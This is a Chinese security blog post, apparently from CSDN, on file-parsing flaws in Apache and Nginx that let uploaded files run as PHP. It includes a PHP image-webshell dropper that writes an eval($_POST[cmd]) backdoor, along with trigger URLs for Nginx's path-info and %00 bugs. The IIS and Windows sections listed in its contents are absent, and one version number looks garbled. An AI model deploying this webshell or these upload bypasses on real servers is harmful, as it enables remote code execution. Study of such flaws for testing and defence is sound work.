文件解析漏洞大全

本文详细介绍了Apache、Nginx、IIS服务器以及Windows系统的文件解析漏洞,包括各种版本的具体利用方式,如Apache的从右向左解析规则,Nginx的%00漏洞,IIS的不同版本漏洞特性,以及Windows中关于文件名的特殊解析行为。这些知识对于理解文件上传漏洞的利用和防护至关重要。
摘要由CSDN通过智能技术生成

目录

前言

一、apache解析漏洞

二、nginx解析漏洞

2.1 nginx<8.03

2.2 nginx 0.5,0.6, 0.7 <= 0.7.65, 0.8 <= 0.8.37

三、IIS解析漏洞

3.1 IIS 5.0/6.0

3.2 IIS 6.0

3.3 IIS 7.x

四、windows解析漏洞

4.1 ​​​​​​​上传jsp%20的文件或者jsp.,windows会删除.和空格

​​​​​​​4.2 上传jsp::DATA文件,windows会不检测DATA后面的后缀名,且保留DATA之前的文件名

 4.3 上传不规则字符如 2.jsp:1.php ,windows会删除不规则:符号后面的内容

总结


​​​​​​​

前言

        文件上传漏洞一般白名单过滤之后都只能配合文件包含漏洞和文件解析漏洞进行上传,本文将介绍文件解析漏洞。

一、apache解析漏洞

        Apache解析文件会遵循从右向左的规则,即从右边开始以此识别.xx的文件名格式,若无法识别则继续向左识别下一个文件名格式

即上传1.php.abc,从右往左会因为无法识别.abc从而当做php文件处理。

二、nginx解析漏洞

2.1 nginx<8.03

        由于nginx默认是用cgi解析php的(即开启fast-cgi模式),因此和IIS一样制作图片马

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

直接访问http://xx.xx.xx.xx/1.jpg/.php

​​​​​​​2.2 nginx 0.5,0.6, 0.7 <= 0.7.65, 0.8 <= 0.8.37

        nginx遇到%00后和fastcgi解析不一致,所以可以上传一个1.jpg图片马,然后访问http://xx.xx.xx.xx/1.jpg%00.php,这样就将jpg文件当做php文件执行了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值